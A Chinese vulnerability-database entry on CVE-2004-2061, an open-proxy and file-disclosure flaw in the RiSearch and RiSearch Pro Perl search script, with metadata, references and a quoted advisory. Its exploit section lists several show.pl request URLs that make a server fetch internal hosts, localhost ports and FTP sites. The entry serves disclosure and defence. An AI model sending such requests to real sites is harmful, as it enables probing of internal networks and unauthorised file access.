RiSearch和RiSearch Pro多个安全漏洞

RiSearch和RiSearch Pro多个安全漏洞

漏洞ID 1108084 漏洞类型 输入验证
发布时间 2004-07-27 更新时间 2005-10-20
图片[1]-RiSearch和RiSearch Pro多个安全漏洞-安全小百科CVE编号 CVE-2004-2061
图片[2]-RiSearch和RiSearch Pro多个安全漏洞-安全小百科CNNVD-ID CNNVD-200407-092
漏洞平台 CGI CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/24326
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200407-092
|漏洞详情
RiSearch(Pro)Suite是一款用户搜索WEB站点的PERL脚本。RiSearch(Pro)存在多个安全问题,远程攻击者可以利用这些漏洞通过FTP或HTTP访问任意端口和或以WEB权限在系统上查看任意文件内容。RiSearch(Pro)包含的show.pl脚本对用户提交的参数缺少充分过滤,攻击者可以操作URI变量请求其他站点,端口和文件。另外对’file’参数缺少充分过滤,提交包含本地系统文件作为参数,可以WEB进程权限查看并返回给攻击者。
|漏洞EXP
source: http://www.securityfocus.com/bid/10812/info

RiSearch and RiSearch Pro are reported prone to an open proxy vulnerability. It is reported that the issue presents itself due to a lack of sufficient sanitization performed on user supplied URI parameters.

A remote attacker may exploit this condition in order to launch attacks against local and public services in the context of the site that is hosting the vulnerable script.

http://www.example.com/cgi-bin/search/show.pl?url=http://www.google.com
http://www.example.com/cgi-bin/search/show.pl?url=http://192.168.0.1
http://www.example.com/cgi-bin/search/show.pl?url=http://localhost:8080
http://www.example.com/cgi-bin/search/show.pl?url=ftp://192.168.0.1
http://www.example.com/cgi-bin/search/show.pl?url=ftp://username:[email protected]
|参考资料

来源:XF
名称:risearch-show-open-proxy(16817)
链接:http://xforce.iss.net/xforce/xfdb/16817
来源:BID
名称:10812
链接:http://www.securityfocus.com/bid/10812
来源:SECUNIA
名称:12173
链接:http://secunia.com/advisories/12173
来源:BUGTRAQ
名称:20040727IRM009:RiSearchandRiSearchProProarevulnerabletoopenFTP/HTTPproxy,directorylistingsandfiledisclosurevulnerabilities
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=109095196526490&w;=2
来源:OSVDB
名称:8266
链接:http://www.osvdb.org/8266
来源:OSVDB
名称:8265
链接:http://www.osvdb.org/8265
来源:SECTRACK
名称:1010788
链接:http://securitytracker.com/id?1010788

相关推荐: WIDZ Remote Root Compromise Vulnerability

WIDZ Remote Root Compromise Vulnerability 漏洞ID 1099710 漏洞类型 Input Validation Error 发布时间 2003-08-23 更新时间 2003-08-23 CVE编号 N/A CNNVD…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享